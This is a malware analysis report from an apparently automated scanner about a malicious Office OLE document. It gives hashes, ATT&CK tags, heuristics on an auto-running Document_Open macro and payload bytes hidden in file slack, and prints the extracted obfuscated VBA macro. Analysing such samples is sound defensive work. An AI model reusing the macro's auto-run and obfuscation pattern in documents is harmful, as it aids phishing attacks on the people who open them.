Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 311b1071f5328c37…

MALICIOUS

Office (OLE)

60.8 KB First seen: 2019-04-17
MD5: 7985066c7ae0b97538b4d86e5fdb985c SHA-1: 32acf2bc24526c98cbdf7c7b963a6d98c7eea167 SHA-256: 311b1071f5328c37b3d899098fd6a5c34901ccffe01c84601e76c3a68703a968
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing a VBA macro named Document_Open, which is designed to execute automatically when the document is opened. The macro code is heavily obfuscated, making it difficult to determine its exact function, but it likely attempts to download and execute a secondary payload. The presence of a Document_Open macro and the OLE slack anomaly suggest malicious intent.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 62,273 bytes but its declared streams total only 36,254 bytes — 26,019 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1271 bytes
SHA-256: dc154782098774cc73fa6007fb5ba05a277e390e1a6d1480953f599ac0885752
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WOKSzAjrcOJvkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If CWfXmK = Vpcqw Then

Dim OsaZv()
JWaOzH = OCRkm + LdkMXH + BFqCz + XdhBG
tdKOb = iPMvJ + EpOmb + fDRqiE + YOnjwj

End If
   If WGIik <> GhBXE Then

Dim otomto()
iGbHIB = jzzsuz + mRJXE + HXJFZ + fLditM
mQwuz = cwVIi + cFiCc + OpWiLw + hfWbC

End If
   If szBOIE > 6 Then

Dim ssFvmz()
vlBDW = jDwFi + uufQP
sUzPl = WbNZw + JtaEr

End If
   If diGApA > 8 Then

Dim jEJuMb()
mucMjA = hvqJFY + pcpDhV + ilTIOp + RRSNWi
wzrKw = wjQrk + wqbUrf + EIIJE + KIQdX

End If
   If qaqfws <= PpvUcY Then

Dim rppzbi()
dNqon = ozjFtv + lXAwV
wqPNnj = jSTajv + RMMAr + AtSJp + jWATpt

End If
   If laOACH >= MViFY Then

Dim ijZLAF()
zCXFX = AJfzd + FScrzL + jEoYnE + iwmbI
nQjiCI = rHwjWA + TfGsb

End If
arwXTMXIaOE (rUVqV + cwbjM + PbXIs + OiEEiHMCU + SzLiH + LJuvGwKqwa + EWzvnpsuV + UWdFcLtrZXz + NQhYniRcOH + qMsqXJW + lObvwW)
   If BziXh <= FzYSU Then

Dim VSpci()
spLFVs = AwwVa + JZRBUb

End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.